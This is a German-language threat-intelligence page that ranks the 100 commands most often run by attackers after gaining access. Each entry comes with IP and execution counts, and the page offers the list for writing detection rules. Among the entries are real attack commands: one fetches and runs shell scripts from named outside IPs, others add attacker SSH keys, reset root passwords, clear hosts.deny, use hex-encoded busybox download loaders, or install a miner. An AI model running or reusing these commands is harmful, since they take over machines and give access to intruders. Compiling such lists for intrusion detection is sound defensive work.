TROYANOSYVIRUS
Aktualisiert: April 2026

Top 100 bosartige Befehle

Die am haufigsten ausgefuhrten Befehle von Angreifern nach Erlangung des Systemzugangs. Nutzlich fur die Erkennung von Eindringlingen und die Reaktion auf Vorfalle.

6,103 Befehle in 24h
1.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
223 IPs289x
2.
$lockr -ia .ssh
223 IPs289x
3.
$uname -a
224 IPs288x
4.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
218 IPs283x
5.
$w
218 IPs283x
6.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
218 IPs283x
7.
$uname -m
218 IPs283x
8.
$crontab -l
218 IPs283x
9.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
217 IPs282x
10.
$top
218 IPs282x
11.
$uname
218 IPs282x
12.
$cat /proc/cpuinfo | grep model | grep name | wc -l
218 IPs282x
13.
$ls -lh $(which ls)
218 IPs282x
14.
$cat /proc/cpuinfo | grep name | wc -l
217 IPs282x
15.
$which ls
218 IPs282x
16.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
216 IPs281x
17.
$whoami
214 IPs278x
18.
$lscpu | grep Model
214 IPs278x
19.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
215 IPs278x
20.
$/bin/./uname -s -v -n -r -m
18 IPs70x
21.
$system
16 IPs34x
22.
$uname -a 2>&1 || echo unknown
31 IPs32x
23.
$shell
12 IPs26x
24.
$/bin/busybox BOT
22 IPs22x
25.
$enable
16 IPs17x
26.
$sh
12 IPs13x
27.
$linuxshell
5 IPs10x
28.
$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"
1 IPs9x
29.
$pm path com.ufo.miner
5 IPs9x
30.
$/ip cloud print
4 IPs8x
31.
$pm install /data/local/tmp/ufo.apk
4 IPs8x
32.
$ps | grep trinity
4 IPs8x
33.
$rm -rf /data/local/tmp/*
4 IPs8x
34.
$rm -f /data/local/tmp/ufo.apk
4 IPs8x
35.
$am start -n com.ufo.miner/com.example.test.MainActivity
4 IPs8x
36.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
4 IPs7x
37.
$/data/local/tmp/nohup /data/local/tmp/trinity
4 IPs7x
38.
$chmod 0755 /data/local/tmp/trinity
4 IPs7x
39.
$chmod 0755 /data/local/tmp/nohup
4 IPs7x
40.
$uname -s -m
7 IPs7x
41.
$ping ;sh
6 IPs7x
42.
$echo -e \x46\x49\x4e
1 IPs5x
43.
$Enter new UNIX password:
2 IPs4x
44.
$Accept-Encoding: gzip
2 IPs4x
45.
$ps | grep '[Mm]iner'
4 IPs4x
46.
$cat /proc/cpuinfo
4 IPs4x
47.
$ps -ef | grep '[Mm]iner'
4 IPs4x
48.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
4 IPs4x
49.
$locate D877F783D5D3EF8Cs
4 IPs4x
50.
$ifconfig
4 IPs4x
51.
$echo Hi | cat -n
4 IPs4x
52.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs3x
53.
$cd /proc/; cat self/cmdline
1 IPs3x
54.
$KHTML, like Gecko
1 IPs2x
55.
$chmod 777 .d
1 IPs2x
56.
$chmod 777 .b
1 IPs2x
57.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
1 IPs2x
58.
$hostname; echo '___BSEP_A1B2C3___'; uname -a; echo '___BSEP_A1B2C3___'; whoami; echo '___BSEP_A1B2C3___'; pwd; echo '___BSEP_A1B2C3___'; ls -la /; echo '___BSEP_A1B2C3___'; ps aux | head -15; echo '___BSEP_A1B2C3___'; netstat -tulpn | head -10; echo '___BSEP_A1B2C3___'; history | tail -5; echo '___BSEP_A1B2C3___'; ssh -V 2>&1; echo '___BSEP_A1B2C3___'; uptime; echo '___BSEP_A1B2C3___'; mount | head -5; echo '___BSEP_A1B2C3___'; env | head -10; echo '___BSEP_A1B2C3___'; cat /etc/os-release 2>/dev
1 IPs2x
59.
$echo "root:0HVPQdiGzy6i"|chpasswd|bash
1 IPs1x
60.
$echo "root:0HC7DUsQ4zcv"|chpasswd|bash
1 IPs1x
61.
$Win64
1 IPs1x
62.
$echo "root:00H1gx2AUdZ4"|chpasswd|bash
1 IPs1x
63.
$echo "Welcome2024!\nBITPOaavsQX7\nBITPOaavsQX7\n"|passwd
1 IPs1x
64.
$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
1 IPs1x
65.
$echo "1z2x3c\nz8pRNt1Z00OF\nz8pRNt1Z00OF\n"|passwd
1 IPs1x
66.
$/bin/busybox echo -en '\x20\x24\x53\x20\x2d\x20\x70\x7c\x7c\x62\x75\x73\x79\x62\x6f\x78\x20\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x24\x53\x2f'>>.d && /bin/busybox echo -e '\x46\x49\x4e'
1 IPs1x
67.
$chmod 777 .d || /bin/busybox chmod 777 .d || cp /bin/sh .d ; > .d
1 IPs1x
68.
$chmod 777 .b || /bin/busybox chmod 777 .b || cp /bin/sh .b ; > .b
1 IPs1x
69.
$Chrome/96.0.4664.45 Safari/537.36
1 IPs1x
70.
$echo "root:7I4mBXMiWsNV"|chpasswd|bash
1 IPs1x
71.
$>yoA@/;'8ELFP;i2
1 IPs1x
72.
$echo "root:7H2J6636iCTF"|chpasswd|bash
1 IPs1x
73.
$echo "root:7E0xzK0xiH9u"|chpasswd|bash
1 IPs1x
74.
$echo "root:7A6P3Q4Em0cu"|chpasswd|bash
1 IPs1x
75.
$>/var/run/.a && cd /var/run/; rm -rf .a
1 IPs1x
76.
$/bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\x67\x61\x79\x66\x67\x74';
1 IPs1x
77.
$/bin/busybox chmod 777 .d; ./.d > .b; /bin/busybox chmod 777 .b; ./.b matrix
1 IPs1x
78.
$echo "root:6JOoKrJx4XnG"|chpasswd|bash
1 IPs1x
79.
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://38.83.138.59:25884/nz.sh; curl -O http://38.83.138.59:25884/nz.sh; chmod 777 nz.sh; sh nz.sh; tftp 165.22.252.236 -c get nz.sh; chmod 777 nz.sh; sh nz.sh; tftp -r 3.sh -g 165.22.252.236; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 165.22.252.236 2.sh 2.sh; sh 2.sh; rm -rf nz.sh nz.sh 3.sh 2.sh; rm -rf *
1 IPs1x
80.
$>/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a
1 IPs1x
81.
$echo "root:5M80Qtq7molB"|chpasswd|bash
1 IPs1x
82.
$echo "root:597SDD9zj8Mg"|chpasswd|bash
1 IPs1x
83.
$>/var/.a && cd /var/; rm -rf .a
1 IPs1x
84.
$/bin/busybox echo -en '\x7c\x62\x75\x73\x79\x62\x6f\x78\x20\x66\x74\x70\x67\x65\x74\x20\x24\x53\x20\x2d\x20\x70\x29'>>.d && /bin/busybox echo -e '\x46\x49\x4e'
1 IPs1x
85.
$echo "root:533em7xIVafx"|chpasswd|bash
1 IPs1x
86.
$echo "root:51FfzMjxdySI"|chpasswd|bash
1 IPs1x
87.
$cat /proc/self/exe
1 IPs1x
88.
$echo "root:5DyHLfRXCWck"|chpasswd|bash
1 IPs1x
89.
$echo "root:4SY7ZPDtvoqk"|chpasswd|bash
1 IPs1x
90.
$echo "root:5WArX4Wm6w8A"|chpasswd|bash
1 IPs1x
91.
$echo "root:5j1Mr7W7XAmV"|chpasswd|bash
1 IPs1x
92.
$echo "root:5ktN8CggMjpK"|chpasswd|bash
1 IPs1x
93.
$echo "root:4MbokoyRszMf"|chpasswd|bash
1 IPs1x
94.
$echo "root:78Fjk6vOcRRg"|chpasswd|bash
1 IPs1x
95.
$cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2
1 IPs1x
96.
$>/usr/.a && cd /usr/; rm -rf .a
1 IPs1x
97.
$echo "root:44Tm1B1jydOj"|chpasswd|bash
1 IPs1x
98.
$echo "root:7HkMPyaL7JSc"|chpasswd|bash
1 IPs1x
99.
$echo "root:3GAu93IHqJff"|chpasswd|bash
1 IPs1x
100.
$cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2
1 IPs1x

Aufklarung

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistenz

crontab, chmod, chattr

Laterale Bewegung

ssh, scp, ping

Erkennungsnutzung

Diese Befehle konnen verwendet werden, um Erkennungsregeln in SIEM, IDS/IPS und Uberwachungssystemen zu erstellen. Uberwachen Sie diese Muster in Ihren Logs, um Eindringlinge zu erkennen.